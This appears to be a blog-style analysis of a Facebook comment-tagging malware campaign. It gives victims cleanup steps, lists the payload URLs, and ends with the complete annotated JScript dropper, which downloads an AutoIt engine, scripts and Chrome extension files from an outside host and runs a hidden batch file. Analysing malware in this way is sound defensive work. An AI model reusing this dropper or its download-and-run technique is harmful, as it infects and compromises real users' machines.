Facebook comment tagging virus

How to protect yourself from it and how to react if you are affected or if you are spreading it.

By ssoosay on flickr cc-by-2.0

This short write-up analyzes the Facebook "comment tagging" malware: what the downloaded script does, who it can infect, and what to do about it. The dropper's code is included at the end.

General info

You may receive a Facebook notification in the app and/or by email saying that a friend tagged you in a comment. Clicking it downloads a .jse script (a Windows Script Host file) to your device; if that script is run, it installs the ransomware described below.

It’s happened to me. Am I infected?

If you are on a Windows machine and the file was run, you are infected: disconnect the computer from the network and turn it off immediately.

If the file has not been run and is just sitting in your Downloads folder, delete it and empty the Recycle Bin.

How can I fix this?

There are labs that know how to handle this kind of infection. Take your computer to one of them.

Essentially, there are processes on your computer that download further files and run installations in the background on your behalf, in order to encrypt your data and demand a ransom.

My friends say I’m spreading the virus — what can I do?

Inform your Facebook friends about the problem on your feed. Share this article with them.

Remove any Chrome extension you do not recognize or did not install yourself (the dropper builds its own extension from the manifest.json and bg.js it downloads):

chrome://extensions/

Disable Facebook logins for any app you do not know or no longer use:

https://www.facebook.com/settings?tab=applications

Remove every device except the one you are doing this from:

https://www.facebook.com/settings?tab=security&section=devices&view

End all of your open Facebook sessions by pressing "End all activity":

https://www.facebook.com/settings?tab=security&section=sessions&view

Then change your Facebook password from the cleaned device, so that whatever is posting the comments cannot simply log back in. Refrain from accessing Facebook on any device until this matter is fully resolved, and consult a professional about the issue. If you find out anything useful about the issue that has not been published, go ahead and publish it.

Remove Google Chrome from your machine. Install a different browser, such as Opera or Firefox, and log in to Facebook from there. If your smartphone is Android, you can remove the Facebook app and use Opera there as well.

The spreading virus definitely has control over your Facebook account. It can be running from any of your devices: smartphones, PCs, browsers and so on. It could even be running from an app connected to Facebook that acts on your behalf.

My research indicates that there is a high probability that it is running from a Chrome extension on one or more of your computers.

Background information

Where is the virus downloaded from ?

It is served from Google Drive (a googleusercontent.com download link), so the download looks as if it comes from Google.

This is the download URL. Do not open it:

https://doc-08-98-docs.googleusercontent.com/docs/securesc/ltg2tcekblb79spmamolu2g3b11sv1dc/jjteoiv1acn1r489ngh32g1fgi5m3bos/1466942400000/18013334076200083322/16418062723037494078/0Bwp3WS-IJOtiWlh3QnFoMWZyamM?e=download

What is a .jse file and how do I open it?

The file saved to your computer has a .jse extension. Windows associates it with Windows Script Host (wscript.exe), which runs it as JScript with the privileges of the logged-in user; nothing else needs to be installed, which is why a double-click is enough to get infected. JScript is Microsoft's dialect of JavaScript, used for scripting Windows and Internet Explorer. The .jse extension normally denotes JScript's encoded form (JScript.Encode), although this sample is plain, merely obfuscated, JScript.

If you want to look at the file, open it from inside a text editor such as Notepad. Never double-click it. A general description of the extension is at http://www.openthefile.net/extension/jse

A more precise title for it would be: Windows Script Host (WScript) ransomware dropper spreading through Facebook comment tags.

How does the virus affect your computer?

If you are on a Windows machine and run the file, Windows Script Host executes it with your user privileges. The script creates the folder %APPDATA%\Mozila, downloads the files listed below into it, and finally launches run.bat from that folder in a hidden window. Those follow-on stages install a Chrome extension that keeps spreading the tag comments and, according to this research, start encrypting files on your hard drive in order to make you pay a ransom to the attackers.

Files downloaded by the virus

http://userexperiencestatics.net/ext/Autoit.jpg

http://userexperiencestatics.net/ext/bg.jpg

http://userexperiencestatics.net/ext/ekl.jpg

http://userexperiencestatics.net/ext/ff.jpg

http://userexperiencestatics.net/ext/force.jpg

http://userexperiencestatics.net/ext/sabit.jpg

http://userexperiencestatics.net/ext/manifest.jpg

http://userexperiencestatics.net/ext/run.jpg

http://userexperiencestatics.net/ext/up.jpg

http://whos.amung.us/pingjs/?k=pingjse346

http://whos.amung.us/pingjs/?k=pingjse3462

The .jpg extension is a disguise. The save names in the script (see the code at the end) show what the files really are: Autoit.jpg is saved as autoit.exe, presumably the interpreter of the AutoIt scripting engine; ekl, force, sabit and up are AutoIt scripts (.au3); manifest.jpg and bg.jpg become manifest.json and bg.js, the manifest and background script of a Chrome extension; ff.jpg becomes ff.zip; and run.jpg becomes run.bat, the batch file the script launches last.

The last two URLs are beacons: whos.amung.us is a visitor-counter service, so every infected machine that fetches them registers itself, with its IP address, on the attacker's counters. The script saves the responses as ping.js and ping2.js.

How does the virus spread?

This virus spreads via Facebook comments in which your friends are tagged. The comments are most likely posted from already-compromised accounts, probably by another component of the same malware, one that may run on smartphones as well as computers.

The JSE file is hosted on Google Drive.

The spreading virus thus uses Facebook for reach and Google Drive for hosting in order to propagate itself.

References

Discussion on stackexchange about this virus

Downloaded JSE file Code

// The string table: every API name, URL and file name is stored as \x-escaped hex and
// referenced by index. The decoded value of each entry is given in a comment.
var _0xe519 = [
    "\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70",                                                                                          // 0: Msxml2.XMLhttp
    "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65",                                                                          // 1: onreadystatechange
    "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65",                                                                                                          // 2: readyState
    "\x73\x74\x61\x74\x75\x73",                                                                                                                          // 3: status
    "\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D",                                                                                                  // 4: ADODB.Stream
    "\x6F\x70\x65\x6E",                                                                                                                                  // 5: open
    "\x74\x79\x70\x65",                                                                                                                                  // 6: type
    "\x77\x72\x69\x74\x65",                                                                                                                              // 7: write
    "\x70\x6F\x73\x69\x74\x69\x6F\x6E",                                                                                                                  // 8: position
    "\x72\x65\x61\x64",                                                                                                                                  // 9: read
    "\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65",                                                                                                          // 10: saveToFile
    "\x63\x6C\x6F\x73\x65",                                                                                                                              // 11: close
    "\x47\x45\x54",                                                                                                                                      // 12: GET
    "\x73\x65\x6E\x64",                                                                                                                                  // 13: send
    "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74",                                          // 14: Scripting.FileSystemObject
    "\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C",                                                                                              // 15: WScript.Shell
    "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E",                                                                              // 16: Shell.Application
    "\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C",                                                                                                          // 17: %APPDATA%\
    "\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73",                                                  // 18: ExpandEnvironmentStrings
    "\x4D\x6F\x7A\x69\x6C\x61",                                                                                                                          // 19: Mozila
    "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D",                                                          // 20: https://www.google.com
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67", // 21: http://userexperiencestatics.net/ext/Autoit.jpg
    "\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65",                                                                                                      // 22: \autoit.exe
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67",                 // 23: http://userexperiencestatics.net/ext/bg.jpg
    "\x5C\x62\x67\x2E\x6A\x73",                                                                                                                          // 24: \bg.js
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67",             // 25: http://userexperiencestatics.net/ext/ekl.jpg
    "\x5C\x65\x6B\x6C\x2E\x61\x75\x33",                                                                                                                  // 26: \ekl.au3
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67",                 // 27: http://userexperiencestatics.net/ext/ff.jpg
    "\x5C\x66\x66\x2E\x7A\x69\x70",                                                                                                                      // 28: \ff.zip
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67",     // 29: http://userexperiencestatics.net/ext/force.jpg
    "\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33",                                                                                                          // 30: \force.au3
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67",     // 31: http://userexperiencestatics.net/ext/sabit.jpg
    "\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33",                                                                                                          // 32: \sabit.au3
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67", // 33: http://userexperiencestatics.net/ext/manifest.jpg
    "\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E",                                                                                          // 34: \manifest.json
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67",             // 35: http://userexperiencestatics.net/ext/run.jpg
    "\x5C\x72\x75\x6E\x2E\x62\x61\x74",                                                                                                                  // 36: \run.bat
    "\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67",                 // 37: http://userexperiencestatics.net/ext/up.jpg
    "\x5C\x75\x70\x2E\x61\x75\x33",                                                                                                                      // 38: \up.au3
    "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36",                         // 39: http://whos.amung.us/pingjs/?k=pingjse346
    "\x5C\x70\x69\x6E\x67\x2E\x6A\x73",                                                                                                                  // 40: \ping.js
    "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32",                     // 41: http://whos.amung.us/pingjs/?k=pingjse3462
    "\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",                                                                                                              // 42: \ping2.js
    ""                                                                                                                                                   // 43: (empty string)
];

(function(_0xc4a4x1) {
    // _0xc4a4x2(url, savePath, offset): synchronous HTTP GET through MSXML, with the
    // response body written to disk via two ADODB.Stream objects. offset selects where
    // in the response the copy starts; every call below passes 0.
    function _0xc4a4x2(_0xc4a4x2, _0xc4a4x3, _0xc4a4x4) {
        if (!_0xc4a4x3 || !_0xc4a4x2) {
            return null
        };
        var _0xc4a4x5 = WScript.CreateObject(_0xe519[0]);                       // Msxml2.XMLhttp
        _0xc4a4x5[_0xe519[1]] = function() {                                     // onreadystatechange
            if (_0xc4a4x5[_0xe519[2]] === 4 && _0xc4a4x5[_0xe519[3]] === 200) { // readyState == 4, status == 200
                xa = new ActiveXObject(_0xe519[4]);                              // ADODB.Stream
                xa[_0xe519[5]]();                                                // open
                xa[_0xe519[6]] = 1;                                              // type = 1 (binary)
                xa[_0xe519[7]](_0xc4a4x5.ResponseBody);                          // write(response bytes)
                xa[_0xe519[8]] = _0xc4a4x4;                                      // position = offset
                stm2 = new ActiveXObject(_0xe519[4]);
                stm2[_0xe519[6]] = 1;
                stm2[_0xe519[5]]();
                stm2[_0xe519[7]](xa[_0xe519[9]]());                              // write(read())
                stm2[_0xe519[10]](_0xc4a4x3, 2);                                 // saveToFile(path, 2 = overwrite)
                stm2[_0xe519[11]]();                                             // close
                xa[_0xe519[11]]()
            }
        };
        _0xc4a4x5[_0xe519[5]](_0xe519[12], _0xc4a4x2, false);                    // open("GET", url, async = false)
        _0xc4a4x5[_0xe519[13]](null)                                             // send
    }
    // _0xc4a4x6(a, b): overwrites file a with the bytes of b followed by the bytes of a.
    // Defined but never called in this sample.
    function _0xc4a4x6(_0xc4a4x7, _0xc4a4x8) {
        {
            xa = new ActiveXObject(_0xe519[4]);
            xa[_0xe519[5]]();
            xa[_0xe519[6]] = 1;
            xa.LoadFromFile(_0xc4a4x7);
            ix = new ActiveXObject(_0xe519[4]);
            ix[_0xe519[5]]();
            ix[_0xe519[6]] = 1;
            ix.LoadFromFile(_0xc4a4x8);
            stm2 = new ActiveXObject(_0xe519[4]);
            stm2[_0xe519[6]] = 1;
            stm2[_0xe519[5]]();
            stm2[_0xe519[7]](ix[_0xe519[9]]());
            stm2[_0xe519[7]](xa[_0xe519[9]]());
            xa[_0xe519[11]]();
            ix[_0xe519[11]]();
            stm2[_0xe519[10]](_0xc4a4x7, 2);
            stm2[_0xe519[11]]()
        }
    }
    fso = new ActiveXObject(_0xe519[14]);                                        // Scripting.FileSystemObject
    var _0xc4a4x9 = new ActiveXObject(_0xe519[15]);                              // WScript.Shell
    _0xc4a4x1 = new ActiveXObject(_0xe519[16]);                                  // Shell.Application
    FileDestr = _0xc4a4x9[_0xe519[18]](_0xe519[17]);                             // ExpandEnvironmentStrings("%APPDATA%\")
    mozklasor = FileDestr + _0xe519[19];                                         // %APPDATA%\Mozila ("klasör" is Turkish for folder)
    if (!fso.FolderExists(mozklasor)) {
        fso.CreateFolder(mozklasor)
    };
    _0xc4a4x1.ShellExecute(_0xe519[20]);                                         // opens https://www.google.com in the default browser, presumably as a decoy
    _0xc4a4x2(_0xe519[21], mozklasor + _0xe519[22], 0);                          // Autoit.jpg   -> autoit.exe
    _0xc4a4x2(_0xe519[23], mozklasor + _0xe519[24], 0);                          // bg.jpg       -> bg.js
    _0xc4a4x2(_0xe519[25], mozklasor + _0xe519[26], 0);                          // ekl.jpg      -> ekl.au3
    _0xc4a4x2(_0xe519[27], mozklasor + _0xe519[28], 0);                          // ff.jpg       -> ff.zip
    _0xc4a4x2(_0xe519[29], mozklasor + _0xe519[30], 0);                          // force.jpg    -> force.au3
    _0xc4a4x2(_0xe519[31], mozklasor + _0xe519[32], 0);                          // sabit.jpg    -> sabit.au3
    _0xc4a4x2(_0xe519[33], mozklasor + _0xe519[34], 0);                          // manifest.jpg -> manifest.json
    _0xc4a4x2(_0xe519[35], mozklasor + _0xe519[36], 0);                          // run.jpg      -> run.bat
    _0xc4a4x2(_0xe519[37], mozklasor + _0xe519[38], 0);                          // up.jpg       -> up.au3
    _0xc4a4x2(_0xe519[39], mozklasor + _0xe519[40], 0);                          // whos.amung.us beacon -> ping.js
    _0xc4a4x2(_0xe519[41], mozklasor + _0xe519[42], 0);                          // whos.amung.us beacon -> ping2.js
    // ShellExecute(file, args, directory, operation, show): launches run.bat with no
    // arguments, working directory %APPDATA%\Mozila, in a hidden window (show = 0).
    _0xc4a4x1.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0)
})(this)